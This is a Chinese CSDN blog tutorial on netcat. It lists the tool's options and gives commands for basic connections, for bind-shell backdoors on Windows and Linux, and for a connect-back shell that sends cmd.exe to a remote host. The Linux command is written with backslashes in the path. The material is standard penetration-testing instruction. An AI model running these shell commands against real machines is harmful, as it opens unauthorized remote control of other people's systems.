netcat使用及反弹shell

本文详细介绍了NetCat在网络中的多种用途,包括参数解析、建立服务器和客户端连接、创建反弹shell、文件传输、端口扫描、Banner信息抓取以及端口转发等。在Windows和Linux环境下,讲解了不同类型的后门制作方法,强调了NetCat在网络安全和渗透测试中的重要性。
摘要由CSDN通过智能技术生成


NetCat

Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。

参数

-g <网关> 设置路由器跃程通信网关,最多可设置8个;
-G <指向器数目> 设置来源路由指向器,其数值为4的倍数;
-i <延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口;
-l 使用监听模式,管控传入的资料;

-L 使用监听模式,客户端失去连接,服务器依然保持监听(低版本没有)

-n 直接使用IP地址,而不通过域名服务器;
-o <输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存
-p <通信端口> 设置本地主机使用的通信端口;
-r 乱数指定本地与远端主机的通信端口;
-s <来源位址> 设置本地主机送出数据包的IP地址;隐藏自己
-u 使用UDP传输协议;
-v 显示指令执行过程;
-w <超时秒数> 设置等待连线的时间;
-z 使用0输入\输出模式,只在扫描通信端口时使用。

-d nc命令在后台执行(退出cmd窗口仍在执行,nc1.11以上版本才有)

-e 执行某个程序,常用于后门建立(有的版本为了安全删除这个选项)

简单通讯

创建一个服务器端

nc -l -p port

在这里插入图片描述

创建一个客户端

nc target_ip target_port -w3

-w3设置等待连线的时间3s,防止未连接上服务器的“假死”现象

在这里插入图片描述

返回shell使用(建立后门)

windows

监听型后门

服务器

nc -l -p port -e cmd.exe    #被连接上会返回一个shell

在这里插入图片描述

客户端

nc target_ip target_port

在这里插入图片描述

连接型后门

服务器

nc -l -p 4444

客户端

我这里使用nc连接不上服务器,要用nc64

nc64 target_ip target_port -e cmd.exe

在这里插入图片描述

在这里插入图片描述

linux

监听型后门
nc -l -p 4444 -e \bin\bash

在这里插入图片描述

  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值